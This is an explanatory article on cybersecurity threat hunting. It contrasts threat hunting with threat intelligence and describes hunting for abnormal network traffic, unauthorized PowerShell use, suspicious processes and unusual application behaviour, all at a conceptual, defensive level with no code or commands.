Threat intelligence gathers information from multiple sources on the most recent attack techniques, tendencies, and both Indicators of Compromise (IOCs) and Indicators of Attacks (IOAs), applying this actionable knowledge about threats to strengthen an environment against attacks. Threat hunting, on the other hand, takes a quite different approach. Threat hunting assumes an advanced threat has already evaded the existing security controls. By creating context-driven hypotheses, a team of threat hunters – the Sherlock sort of cybersecurity specialists – proactively search for threats, analyzing the patterns on network traffic and logs from existing devices and discovering abnormalities that may indicate a compromise.
What Types of Threats Can Be Hunted?
A key point is understanding the types of threats that can be hunted. By definition, a threat is any agent with the desire, capability and opportunity to do harm to an organization. This can be a rather lengthy list, including disgruntled/dishonest employees, competitors, hacktivists, cybercriminals and even nation-states. Since threat hunting should be based on the organization context, a good first step is defining what sort of threat the organization is most exposed to. That way, their motivations and techniques can be taken into consideration during the hunt, especially when devising the hypothesis that will be tested. For example: “Are any of our endpoints infected with a new malware and remotely controlled by an unauthorized agent trying to steal confidential information?” Here are a few examples of the most common threats every organization should be hunting.
Abnormal Network Activity
It’s quite common to say threat hunters are usually looking for the needle in the haystack, and it makes perfect sense! Hunting focuses on advanced threats which have already circumvented security controls and have remained hidden within, for example, the characteristic noise of a corporate network devices. One of the most common IOCs used by hunters is excessive network traffic denied by a firewall. If a host is systematically being blocked when trying to access an unusual destination, this may be an infected endpoint trying to inform its handler that it is alive and ready for further action. Filtering out legitimate activity is a central role in threat hunting. Analysts can create a network traffic baseline and use it to filter legitimate traffic and isolate anomalous activities, such as unusual DNS requests and mismatched port-application traffic. Now, since anomalous does not mean malicious, hunters must find out if these activities are either trails left by attackers or explainable exceptions that could be added to the traffic baseline.
Malicious/Unauthorized PowerShell Scripts
As expected, sorting out suspicious activities should not be limited to network traffic. For instance, it’s quite usual for organizations to use PowerShell scripts for managing endpoints, and attackers know that! Using a similar approach to what was done with network traffic, hunters can map legitimate use cases of PowerShell and investigate any unauthorized use to confirm if such activity is a valid exception (that should be also mapped out) or part of an attack.
A malicious PowerShell script, probably trying to mine some cryptocurrency
Processes and Binaries
A point of note: hunting is not alert-based. In fact, it is a continuous effort of looking for any evidence that could be the sign of an intrusion. For example, hunters can spot malicious processes and binaries by checking for attributes such as specific names, file paths or checksums, especially when threat intelligence is available. Other characteristics should also be used on the hunt, including the process/binary network activity, or confirming if it tries to make changes to the registry or create child processes. Again, the key point is not the attribute itself, but using these characteristics and confirming if the behavior of the process/binary can be considered abnormal.
Unusual Behavior in Application Usage
There are many times a deeper investigation is necessary. With the vast majority of network compromises and data breaches having the appearance of authorized activity, even to the point of using valid, previously stolen credentials, from a hunter’s point of view it does not matter if the authentication was completed without problem. It’s all a question of understanding if the access is usual behavior, or if the actions taken once access was granted can be considered suspicious. This phase of the hunting process is normally quite interactive, as hunters may ask for help from IT or even non-technical staff to confirm if abnormalities in the OS, application-use cases and data flow are normal or a threat. For example, creating a report from a finance application is a common task, but if a user, even with valid credentials, is systematically exporting data (e.g. the customers list, banking information, personal data) in a way that is not usual, it should be investigated. For instance, if this valid user is accessing the financial application from the same host that was identified with an unauthorized PowerShell script or abnormal network activity, this will probably sound as a red alert for the hunter. It’s quite probable an unknown agent is trying to exfiltrate data.
Conclusion
It should be clear that threat hunting is all about knowing your environment and anticipating the actions of an attacker based on their motivations. Hunters must know what the high-value targets are and use their expertise to pin down the security’s weak spots, quite the same way an attacker will do. Staying ahead of current cyberthreats is not an easy task: it requires not only a detailed understanding of the context the organization is in, but also sufficient visibility of incoming hazards and evidence-based actionable intelligence for choosing the best course of action for dealing with malicious activities. A mature threat-hunting process goes well beyond traditional security tactics, enabling a systematic proactive approach where the hunted becomes the hunter and it’s open season on all cyberthreats. Corporations today no longer have the luxury of wondering if a security breach will occur. Instead they should focus on assuming an attacker may already have compromised critical systems and take swift action to avoid an unacceptable level of impact.
